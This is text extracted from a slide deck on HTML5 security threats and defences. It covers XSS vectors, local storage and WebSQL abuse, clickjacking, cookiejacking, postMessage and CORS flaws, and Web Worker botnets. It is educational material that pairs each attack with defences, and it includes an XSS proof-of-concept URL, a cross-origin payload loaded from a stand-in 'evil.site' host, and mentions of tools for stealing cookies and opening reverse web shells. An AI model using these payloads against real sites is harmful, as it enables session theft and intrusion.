This document discusses HTML5 security threats and defenses. It covers the history of HTML standards, new HTML5 features, and vulnerabilities like XSS, cookie/storage stealing, SQL injection, and more. It also provides tools for analyzing HTML5 threats and examples of real attacks exploiting features like WebSQL, local storage, and cross-origin requests. Defenses include input validation, avoiding sensitive data storage, and configuring CORS headers appropriately.

1. youstar@insight-labs

2.  Introduction to HTML5
 HTML5 threat model
 Vulnerabilities & Defense
 Tools
 Reference

3.  History
 HTML1.0——1993.6 Not Standard
 HTML 2.0——1995.11 RFC 1866
 HTML 3.2——1996.1.14 W3C Recommended Standard
 HTML 4.0——1997.12.18 W3C Recommended Standard
 HTML 4.01——1999.12.24 W3C Recommended Standard
 XHTML——2000.1.20 W3C Recommended Standard
 HTML5——2008 First Draft Standard
 2012 W3C Candidate Recommendation

4.  Features
 The three aspects of HTML5
▪ Content HTML
▪ New Tags and Attributes
▪ Presentation of content CSS
▪ Interaction with content JavaScript
▪ Add New API Drag LocalStorage WebWorkers etc

5.  Features

8.  XSS abuse with tags and attributes
 Hiding URL Code
 Stealing from the storage
 Injecting and Exploiting WebSQL
 ClickJacking &&CookieJacking
 Cross Origin Request and postMessage
 Client‐side File Includes
 Botnet and widgets

9.  In:
 New tags: <button>,<video>,<audio>,<article>,<footer>,<nav>
 New attributes for tags: autocomplete, autofocus, pattern(yes,regex) for
input
 New media events
 New <canvas> tag for 2D rendering
 New form controls for date and time
 Geolocation
 New selectors
 Client-side storage including localStorage, sessionStorage, and WebSQL
 Out:
 Presentation elements such a <font>, <center>
 Presentation attributes including align, border
 <frame>,<frameset>
 <applet>
 Old special effects: <marquee>,<bgsound>
 <noscript>

10.  Attack:
 New XSS Vector
 Bypass Black-list Filter
 Defense:
 Add new tags to Black-list
 Change Regex

12.  DOM
 window.history.back();
 window.history.forward();
 window.history.go();
 HTML5
 history.pushState()
▪ history.pushState(state object,title,URL);
 history.replaceState()
▪ The same with pushState,but modifies the current
history entry.

13. http://127.0.0.1/html5/poc/history/xsspoc.php?xss=<
script>history.pushState({},'',location.href.split("?").
shift());document.write(1)</script>
http://127.0.0.1/html5/poc/history/xsspoc.php

15.  Type
 LocalStorage：for long-term storage
 SessionStorage：for the session application(last
when the browser closed)
 Differences
 Cookies：4k
 LocalStorage/ SessionStorage：depends on
browser(usually 5MB)
 Support
 Firefox 3.5, Safari 4.0, IE8, Google Chrome, Opera
10.50

17.  Function
 (localStorage | sessionStorage).setItem()
 (localStorage | sessionStorage).getItem()
 (localStorage | sessionStorage).deleteItem()
 (localStorage | sessionStorage).clear()

18.  Attack
 Get the data from the storage(cookie,passwd,etc)
 Storage your xss shellcode
 Unlimit the path
 Defense
 Don’t store sensitive data in local storage
 Don't use local storage for session identifiers
 Stick with cookies and use the HTTPOnly and
Secure flags

20.  Database Storage
 The same as the Google Gears
 Operate
 openDatabase("Database Name", "Database Version", "Database
Description", "Estimated Size");
 transaction("YOUR SQL STATEMENT HERE");
 executeSql();
 Type
 SQLite (support by WebKit)

21.  Attack
 Store shellcode
 SQL inject
 Defense
 Strick with the sql operate
 Encode the sql result before display
 Don’t store sensitive data

22.  Store shellcode

23.  SQL Injection
 Use sqlite_master
▪ SELECT name FROM sqlite_master WHERE type='table'
▪ SELECT sql FROM sqlite_master WHERE
name='table_name'
▪ SELECT sqlite_version()
 Select with ?
▪ executeSql("SELECT name FROM stud WHERE id=" +
input_id); False
▪ executeSql("SELECT name FROM stud WHERE id=?",
[input_id]); True

24.  Drag and drop basics
 Drag Data
 the drag feedback image
 drag effects
 Drag events:
 dragstart
 dragenter
 dragover
 dragleave
 drag
 drop
 dragend

26.  ClickJacking
 XSS + Drag

28.  CookieJacking
 Use many technology to steal user’s local cookies
 Technology
 How to read the local fileiframe+file://
 How to detect the state of cookies Clickjacking
 How to send cookiesSMB

30.  Defense
 Use iframe with sandbox
 If (top !== window) top.location=
window.location.href;
 if (top!=self) top.location.href=self.location.href

31.  postMessage
 Send
▪ otherWindow.postMessage(message, targetOrigin);
 Receive
window.addEventListener("message", receiveMessage, false);
function receiveMessage(event)
{
if (event.origin !== "http://example.org:8080")
return;
// ...
}

33.  Defense
 Check the postMessage origin
 Don’t use innerHTML
▪ Element.innerHTML=e.data;//danger
▪ Element.textContent=e.data;//safe
 Don’t use Eval to deal with the mesage

34.  Cross-Origin Resource Sharing
▪ Originally Ajax calls were subject to Same Origin Policy
▪ Site A cannot make XMLHttpRequests to Site B
▪ HTML5 makes it possible to make these cross domain calls
▪ Site ASite B(Response must include a header)
▪ Access-Control-Allow-Origin: Site A Must
▪ Access-Control-Allow-Credentials: true | false
▪ Access-Control-Expose-Headers:
▪ etc

37.  Defense
 Don’t set this: Access-Control-Allow-Origin: *
▪ （Flash crossdomain.xml ）
 Prevent DDOS
▪ if(origin=="Site A"){header(Access-Control-Allow-
Origin:Site A)……//process request}

38.  Code like this:
<html><body><script>
x = new XMLHttpRequest();
x.open("GET",location.hash.substring(1));
x.onreadystatechange=function(){if(x.readyState==4){
document.getElementById("main").innerHTML=x.responseText;}}
x.send();
</script>
<div id=“main”></div>
</body></html>
 POC
 Introducing Cross Origin Requests http://example.com/#http://evil.site/payload.php
 VContents of ‘payload.php’ will be included as HTML within <div id=“main”></div>
 New type of XSS!!

40.  Web Workers
 running scripts in the background independently
 Very simple
var w = new Worker("some_script.js");
w.onmessage = function(e) { // do something };
w.terminate()
 Access
▪ XHR,navigator object,application cache,spawn other workers!
 Can’t access
▪ DOM,window,document objects

41.  Attack
 Botnet
▪ Application‐level DDoS attacks
▪ Email Spam
▪ Distributed password cracking
 Network Scanning
 Guessing User’s Private IP Address
▪ Identify the user’s subnet
▪ Identify the IP address

42.  COR+XSS+Workers=shell of the future

43.  HTML5CSdump
 enumeration and extraction techniques described
before to obtain all the client-side storage relative
to a certain domain name
 JS-Recon
 Port Scans
 Network Scans
 Detecting private IP address

44.  Imposter
 Steal cookies
 Set cookies
 Steal Local Shared Objects
 Steal stored passwords from FireFox
 etc
 Shell of the Future
 Reverse Web Shell handler
 Bypass anti-session hijacking measures

45.  Ravan
 JavaScript based Distributed Computing system
 hashing algorithms
▪ MD5
▪ SHA1
▪ SHA256
▪ SHA512

46.  HTML5 带来的新安全威胁:xisigr
 Attacking with HTML5:lavakumark
 Abusing HTML5:Ming Chow
 HTML5 Web Security:Thomas Röthlisberger
 Abusing HTML 5 Structured Client-side Storage:Alberto Trivero
 Cookiejacking：Rosario Valotta
 http://heideri.ch/jso/#html5
 http://www.wooyun.org/bugs/wooyun-2011-02351
 http://shreeraj.blogspot.com/2011/03/html-5-xhr-l2-and-
dom-l3-top-10-attacks.html
 http://www.html5test.com

47.  http://hi.baidu.com/xisigr/blog/item/aebf0728abd960f299250abe.
html
 http://blog.whatwg.org/whats-next-in-html-episode-2-sandbox
 http://code.google.com/intl/zh-CN/apis/gears/api_database.html
 http://michael-coates.blogspot.com/2010/07/html5-local-storage-
and-xss.html
 http://www.w3.org/TR/access-control/
 http://m-austin.com/blog/?p=19
 https://developer.mozilla.org/en/
 http://www.w3.org/TR/cors/
 http://www.andlabs.org/tools/ravan.html
 http://www.gnucitizen.org/blog/client-side-sql-injection-attacks/

48.  Contact Me
 email:youstar@foxmail.com
 Site:
 www.codesec.info
 www.insight-labs.org